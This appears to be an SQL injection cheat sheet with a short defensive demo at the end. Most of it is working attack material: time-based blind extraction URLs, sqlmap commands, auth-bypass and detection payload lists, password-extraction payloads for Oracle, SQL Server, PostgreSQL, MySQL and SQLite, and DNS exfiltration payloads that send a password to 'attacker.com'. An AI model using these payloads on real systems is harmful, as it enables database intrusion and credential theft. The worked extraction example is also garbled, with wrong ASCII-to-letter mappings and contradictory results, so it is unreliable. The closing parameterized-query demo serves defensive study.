http://redact.com/page.aspx?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:5'--
http://redact.com/page.aspx?id=1; IF (LEN(USER)=4) WAITFOR DELAY '00:00:5'--
http://redact.com/page.aspx?id=1; IF (LEN(USER)=5) WAITFOR DELAY '00:00:5'-- (+5 seconds)
Result = 5 characters in length
Determine length, and then try to find out CHAR value one character position at a time, like this:
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))>96) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))>50) WAITFOR DELAY '00:00:5'--
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))>98) WAITFOR DELAY '00:00:5'--
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1))=97) WAITFOR DELAY '00:00:5'-- (+5 seconds)
Result = the first character CHAR value is 97 which is an "a"
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),2,1)))>99) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),2,1)))=50) WAITFOR DELAY '00:00:5'-- (+5 seconds)
Result = the second character CHAR value is 50 which is a "d"
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),3,1)))>58) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),3,1)))=59) WAITFOR DELAY '00:00:5'-- (+5 seconds)
Result = third character CHAR value is 59 which is the letter "m"
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),4,1)))>54) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),4,1)))=55) WAITFOR DELAY '00:00:5'-- (+5 seconds)
Result = the fourth character CHAR value is 55 which is an "i"
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),5,1)))>59) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),5,1)))=15) WAITFOR DELAY '00:00:5'-- (+5 seconds)
Result = the fifth character CHAR value is 15 which is the letter "n"
Database User = 97,50,59,55,15 = admin
TIME-BASED Extraction of 1st TABLE COLUMNS:
Let's enumerate some columns from the table(s) we found:
http://redact.com/page.aspx?id=1; IF (LEN(SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members')=4) WAITFOR DELAY '00:00:5'-- (+5 seconds)
Check the column name's length first, before you start testing characters one position at a time:
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=117) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=115) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=51) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=114) WAITFOR DELAY '00:00:5'-- (+5 seconds)
Column Name = 117,115,51,114 = user
Postgresql Blind SQLI(Stacked Queries):
id=1; select pg_sleep(5);-- -
1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(5) end;-- -
Blind SQL injection exploitation via sqlmap:
sqlmap -r req.txt -v 3 --time-sec=5 --technique=T --current-db
sqlmap -r req.txt -v 3 -p "input parameter" --level=5 --risk=3 --time-sec=5 --technique=T --current-db
sqlmap -r req.txt -v 3 -p "input parameter" --level=5 --risk=3 --time-sec=5 --technique=BT --current-db
SQL detection payload (Generic Error):
'
"
"'
' "
'"
'''
.
/
\
%5c
%27
%22
%23
%3B
%27%22%60
%22%27
%27%20%22
%27%22
%27%27%27
)
")
')
))
"))
'))
)))
#
;
''
`
``
,
""
//
\\
%
%00
||
0.or-1%23
'or-1%23
%2F
%5C
%29
%22%29
%27%29
%29%29
%22%29%29
%27%29%29
%27%27
%60
%60%60
%2C
%22%22
%2F%2F
%5C%5C
%7C%7C
%28
%2A%7C
//*
%7C
%29
(
*/*
|
*
*)(&
*)(|(&
*)(|(*
*))%00
-'
Detection source (error-message regex patterns, grouped by database engine):
["SQL syntax.*MySQL", "Warning.*mysql_.*", "valid MySQL result", "MySqlClient\."]
["PostgreSQL.*ERROR", "Warning.*\Wpg_.*", "valid PostgreSQL result", "Npgsql\."]
["Driver.* SQL[\-\_\ ]*Server", "OLE DB.* SQL Server", "(\W|\A)SQL Server.*Driver", "Warning.*mssql_.*", "(\W|\A)SQL Server.*[0-9a-fA-F]{8}", "(?s)Exception.*\WSystem\.Data\.SqlClient\.", "(?s)Exception.*\WRoadhouse\.Cms\."]
["Microsoft Access Driver", "JET Database Engine", "Access Database Engine"]
["\bORA-[0-9][0-9][0-9][0-9]", "Oracle error", "Oracle.*Driver", "Warning.*\Woci_.*", "Warning.*\Wora_.*"]
["CLI Driver.*DB2", "DB2 SQL error", "\bdb2_\w+\("]
["SQLite/JDBCDriver", "SQLite.Exception", "System.Data.SQLite.SQLiteException", "Warning.*sqlite_.*", "Warning.*SQLite3::", "\[SQLITE_ERROR\]"]
["(?i)Warning.*sybase.*", "Sybase message", "Sybase.*Server message.*"]
SQL Injection Auth Bypass:
'=' 'or'
' or ''='
/1#\
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
1'or'1'='1
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' or '1'='1'/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
Exploiting Blind SQL Injection
Extracting Data Using Boolean-based Blind SQL Injection:
This method involves asking a series of true/false questions to extract data character by character.
Example Payloads:
- Extracting a single character:
- Oracle:
'; SELECT CASE WHEN (SUBSTR((SELECT password FROM users WHERE username='admin'),1,1) = 'a') THEN 'true' ELSE 'false' END FROM dual; --
- Microsoft SQL Server:
'; IF (SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1) = 'a') WAITFOR DELAY '0:0:10'; --
- PostgreSQL:
'; SELECT CASE WHEN (SUBSTRING((SELECT password FROM users WHERE username='admin') FROM 1 FOR 1) = 'a') THEN pg_sleep(10) ELSE pg_sleep(0) END; --
- MySQL:
'; SELECT IF(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1) = 'a', SLEEP(10), 'a'); --
- SQLite:
'; SELECT CASE WHEN (SUBSTR((SELECT password FROM users WHERE username='admin'),1,1) = 'a') THEN 1 ELSE 0 END; --
Extracting Data Using Time-based Blind SQL Injection:
Similar to Boolean-based, but uses time delays to infer true/false responses.
Example Payloads:
- Extracting a single character:
- Oracle:
'; BEGIN IF (SUBSTR((SELECT password FROM users WHERE username='admin'),1,1) = 'a') THEN dbms_pipe.receive_message(('a'),10); END IF; END; --
- Microsoft SQL Server:
'; IF (SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1) = 'a') WAITFOR DELAY '0:0:10'; --
- PostgreSQL:
'; SELECT CASE WHEN (SUBSTRING((SELECT password FROM users WHERE username='admin') FROM 1 FOR 1) = 'a') THEN pg_sleep(10) ELSE pg_sleep(0) END; --
- MySQL:
'; SELECT IF(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1) = 'a', SLEEP(10), 'a'); --
- SQLite:
'; SELECT CASE WHEN (SUBSTR((SELECT password FROM users WHERE username='admin'),1,1) = 'a') THEN 1 ELSE 0 END; --
Using DNS Exfiltration for Blind SQL Injection:
If the database allows for DNS lookups, data can be exfiltrated by encoding it in DNS queries.
Example Payloads:
- Oracle:
'; SELECT UTL_INADDR.get_host_address((SELECT password FROM users WHERE username='admin') || '.attacker.com'); --
- Microsoft SQL Server:
'; DECLARE @p varchar(1024); SET @p=(SELECT password FROM users WHERE username='admin'); EXEC('master..xp_dirtree ''\\' + @p + '.attacker.com\'''); --
- PostgreSQL:
'; COPY (SELECT password FROM users WHERE username='admin') TO PROGRAM 'nslookup ' || password || '.attacker.com'; --
- MySQL:
'; SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM users WHERE username='admin'),'.attacker.com\\a')); --
- SQLite: SQLite does not support DNS lookups.
Important Note:
Always use prepared statements and parameterized queries to prevent SQL injection vulnerabilities.
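To make that concrete, here is an added example (not from the original page) that runs the tautology payload from the auth-bypass list and the boolean-blind oracle payload from the SQLite extraction section against the same lookup written both ways. The in-memory SQLite table, the user rows and the function names are constructed for this demonstration.

```python
import sqlite3

# Payloads taken from the lists on this page, used here only as test input.
TAUTOLOGY = "' OR 1=1 --"
ORACLE_TRUE = ("admin' AND SUBSTR((SELECT password FROM users "
               "WHERE username='admin'),1,1)='s")
ORACLE_FALSE = ("admin' AND SUBSTR((SELECT password FROM users "
                "WHERE username='admin'),1,1)='x")


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table (not from the page) with two users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "hunter2")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """String-concatenated query: the input becomes part of the SQL text,
    so a quote in it ends the literal and the rest is parsed as SQL."""
    sql = ("SELECT username FROM users WHERE username = '"
           + username + "' ORDER BY username")
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn: sqlite3.Connection, username: str) -> list:
    """Same lookup with a bound parameter: the driver passes the value to the
    engine separately from the statement, so it is only ever compared as data."""
    sql = "SELECT username FROM users WHERE username = ? ORDER BY username"
    return [row[0] for row in conn.execute(sql, (username,))]


def compare(payload: str) -> tuple:
    """Return (vulnerable result, parameterized result) for one input."""
    conn = make_db()
    try:
        return lookup_vulnerable(conn, payload), lookup_parameterized(conn, payload)
    finally:
        conn.close()


if __name__ == "__main__":
    # The vulnerable version answers the boolean oracle (one row vs. none),
    # which is exactly the true/false channel blind SQLi relies on; the
    # parameterized version returns no row for either probe.
    for label, payload in [("legit", "alice"), ("tautology", TAUTOLOGY),
                           ("oracle true", ORACLE_TRUE),
                           ("oracle false", ORACLE_FALSE)]:
        vuln, safe = compare(payload)
        print(f"{label:<13} vulnerable={vuln} parameterized={safe}")
```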